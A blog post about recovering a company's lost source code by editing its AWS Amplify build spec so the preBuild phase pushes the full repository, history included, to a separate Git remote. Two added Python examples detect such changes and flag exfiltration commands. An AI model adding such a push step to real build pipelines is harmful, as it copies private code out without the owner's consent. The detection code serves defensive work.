
The day I recovered the company's source code

Abílio Azevedo

I wrote this article for the Revelo community. You can access it in Portuguese here. The English version is below.

TLDR

This article details the experience of recovering lost source code from a company that was connected to AWS Amplify. By changing the amplify.yml file, it was possible to push the source code to a Git repository during the build process. We will explore how Amplify works, focusing on security aspects and detailing how the source code is exposed at build time.

As developers, we run into hassles every day. A company contacted me to do some freelance "small tweaks", but they didn't have access to the source code written by the previous developer 😅. So, would you take on the project? Tell them to start from scratch? Try to recover the source code?

Scenario

The source code was stored on GitHub and hosted on AWS through Amplify. We didn't have access to the repository, but we did have access to the AWS dashboard.

Theory

At some point the code leaves GitHub and goes to AWS to be built and hosted, so that is where we can get hold of it. There is light at the end of the tunnel!

What is AWS Amplify?

AWS Amplify is a set of tools and services that allow developers to build scalable and secure applications in the cloud. It provides an easy-to-use interface to manage backend and frontend resources, including authentication, APIs, storage, and hosting.

You can start using Amplify by setting up a repository for your source code.

(Image: Amplify hosting)

Notice that you need to authorize AWS Amplify to read your code and to write the amplify.yml file. That file controls the build and deploy process in Amplify and can be customized to meet specific project needs.

(Image: Amplify installation)

Source Code Recovery

As we have seen, the source code is exposed to AWS Amplify so that the build can run. In other words, don't connect your repository to just any service or any account. In this case, the previous developer who was providing the service believed his code was inaccessible. We now know this is not true.

The build settings live in a YAML file and can be modified from the AWS dashboard or from the repository itself, as the following image shows:

(Image: Amplify build settings)
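Because a build-settings edit made in the console is an API call, it leaves a record in CloudTrail. The following is an added example, not code from the original post, that picks Amplify build-setting changes out of CloudTrail records and reports who made them. Amplify calls are logged under eventSource amplify.amazonaws.com with UpdateApp and UpdateBranch as the event names; that those records carry the new buildSpec under requestParameters is an assumption to confirm against your own trail, and the sample records below are constructed.

```python
"""Find Amplify build-setting changes in CloudTrail records.

Added example, not code from the original post. Field names follow the
CloudTrail record format (eventSource, eventName, userIdentity,
requestParameters); that UpdateApp/UpdateBranch records include the new
"buildSpec" under requestParameters is an assumption to verify against a
real trail. SAMPLE_RECORDS is constructed for this example.
"""
import gzip
import json

AMPLIFY = "amplify.amazonaws.com"
WATCHED = {"UpdateApp", "UpdateBranch"}   # calls that rewrite build settings


def load_records(path):
    """Read one CloudTrail log file (gzip-compressed JSON) and return its Records."""
    with gzip.open(path, "rt", encoding="utf-8") as fh:
        return json.load(fh).get("Records", [])


def build_spec_changes(records):
    """Return one summary dict per event that replaced an Amplify build spec.

    Events from other services, other Amplify calls, and Update* calls that
    touched fields other than buildSpec are skipped.
    """
    hits = []
    for rec in records:
        if rec.get("eventSource") != AMPLIFY or rec.get("eventName") not in WATCHED:
            continue
        params = rec.get("requestParameters") or {}
        spec = params.get("buildSpec")
        if spec is None:
            continue
        identity = rec.get("userIdentity") or {}
        hits.append({
            "time": rec.get("eventTime"),
            "action": rec["eventName"],
            "appId": params.get("appId"),
            "branch": params.get("branchName"),
            "actor": identity.get("arn") or identity.get("userName"),
            "sourceIp": rec.get("sourceIPAddress"),
            # cheap triage hint: does the new spec push the checkout anywhere?
            "pushesToRemote": "git push" in spec,
        })
    return hits


# Constructed records: a console edit that injects a push step, a harmless
# rename of the same app, and an unrelated S3 call that must be ignored.
SAMPLE_RECORDS = [
    {
        "eventTime": "2024-01-10T14:02:11Z",
        "eventSource": AMPLIFY,
        "eventName": "UpdateApp",
        "sourceIPAddress": "203.0.113.7",
        "userIdentity": {"type": "IAMUser", "userName": "contractor",
                         "arn": "arn:aws:iam::123456789012:user/contractor"},
        "requestParameters": {
            "appId": "d1exampleappid",
            "buildSpec": ("version: 1\nfrontend:\n  phases:\n    preBuild:\n"
                          "      commands:\n"
                          "        - git remote add alternate-repo <ALTERNATE_REPO_URL>\n"
                          "        - git push alternate-repo master\n"),
        },
    },
    {
        "eventTime": "2024-01-10T15:30:00Z",
        "eventSource": AMPLIFY,
        "eventName": "UpdateApp",
        "sourceIPAddress": "203.0.113.9",
        "userIdentity": {"type": "IAMUser", "userName": "admin",
                         "arn": "arn:aws:iam::123456789012:user/admin"},
        "requestParameters": {"appId": "d1exampleappid", "name": "company-site"},
    },
    {
        "eventTime": "2024-01-10T15:31:00Z",
        "eventSource": "s3.amazonaws.com",
        "eventName": "PutObject",
        "userIdentity": {"type": "AssumedRole"},
        "requestParameters": {"bucketName": "company-assets", "key": "logo.png"},
    },
]

if __name__ == "__main__":
    for hit in build_spec_changes(SAMPLE_RECORDS):
        print(json.dumps(hit, indent=2))
```

For a quick look without downloading log files, the 90-day event history answers the same question: `aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventSource,AttributeValue=amplify.amazonaws.com`. The lasting fix is on the IAM side: only the people who should be changing build settings get `amplify:UpdateApp` and `amplify:UpdateBranch`, because whoever holds them can read the whole repository through the build.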

As I didn't have access to the repository, I modified this file through the AWS dashboard the company had access to, and added a step before the build that pushed all of the code to an empty Git repository, preserving the entire history of code changes.

version: 1
frontend:
  phases:
    preBuild:
      commands:
        # the build runs on a full checkout, so push it (history included)
        # to a repository we control before the build itself starts
        - echo 'Enviando código fonte para o repositório Git alternativo'
        - git remote add alternate-repo <URL_DO_REPOSITÓRIO_ALTERNATIVO>
        - git push alternate-repo master
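The defender's counterpart to the build-spec change above, as an added example that is not the post's own code: a small scanner that reads an Amplify build spec and flags phase commands that move the checkout off the build host. It assumes you have already pulled the spec text, for instance with `aws amplify get-app --app-id <APP_ID> --query app.buildSpec --output text` (and `aws amplify get-branch` for per-branch overrides); the pattern list and the sample spec are constructed, and the reader only understands the spec layout shown on the page so that it needs no YAML library.

```python
"""Flag build-spec commands that can copy a repository off the build host.

Added example, not code from the original post. It assumes the build spec
text was fetched beforehand, e.g.
  aws amplify get-app --app-id <APP_ID> --query app.buildSpec --output text
(a console-edited spec lives in the app/branch settings, not in the repo).
"""
import re

# Patterns that, inside a build phase, move repository contents somewhere
# other than the Amplify build itself. Constructed list; extend as needed.
SUSPICIOUS = [
    (r"\bgit\s+remote\s+add\b", "adds a git remote inside the build"),
    (r"\bgit\s+push\b", "pushes the checkout to a remote"),
    (r"\bcurl\b.*(-T|--upload-file|-d\s*@|--data-binary\s*@)", "uploads a file with curl"),
    (r"\bscp\b|\brsync\b.*:", "copies files to a remote host"),
    (r"\baws\s+s3\s+(cp|sync)\b.*\s+s3://", "copies files to an S3 bucket"),
    (r"\btar\b.*\|", "archives files into a pipe"),
]

PHASES = ("preBuild", "build", "postBuild")


def extract_commands(spec_text):
    """Minimal line-based reader for the Amplify build spec layout.

    Returns a list of (phase, command) tuples. It only understands the shape
    shown on the page (phases -> <phase>: -> commands: -> '- cmd'); a real
    tool would use a YAML parser instead.
    """
    commands = []
    phase = None
    in_commands = False
    for raw in spec_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key = line.rstrip(":")
        if key in PHASES and line.endswith(":"):
            phase, in_commands = key, False
            continue
        if line == "commands:":
            in_commands = phase is not None
            continue
        if in_commands and line.startswith("- "):
            commands.append((phase, line[2:].strip()))
            continue
        if line.endswith(":"):
            in_commands = False   # some other mapping key ends the list
    return commands


def scan_build_spec(spec_text):
    """Return (phase, command, reason) for every command matching a pattern."""
    findings = []
    for phase, cmd in extract_commands(spec_text):
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, cmd):
                findings.append((phase, cmd, reason))
                break
    return findings


# Constructed sample: the spec from the post with an ordinary build appended.
SAMPLE_SPEC = """\
version: 1
frontend:
  phases:
    preBuild:
      commands:
        - echo 'Enviando código fonte para o repositório Git alternativo'
        - git remote add alternate-repo <URL_DO_REPOSITÓRIO_ALTERNATIVO>
        - git push alternate-repo master
        - npm ci
    build:
      commands:
        - npm run build
  artifacts:
    baseDirectory: build
    files:
      - '**/*'
"""

if __name__ == "__main__":
    for phase, cmd, reason in scan_build_spec(SAMPLE_SPEC):
        print(f"[{phase}] {reason}: {cmd}")
```

Run against every app and branch in the account on a schedule, and diff the result against the amplify.yml in the repository: a spec that only exists in the console is the case the post describes, and it is the one worth a second look.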

With this we found out that the developer was outsourcing the service to someone else 🤡.

Note: If outsourcing was authorized in the contract, everything is fine. The guy went silent when he found out we were able to access the source code. But that's it folks, pay attention to the possibilities, understand how the tools work and their concepts so you can use them in the best way and get out of hassles like this, always ethically.

That is All Folks


© 2024, Abílio Azevedo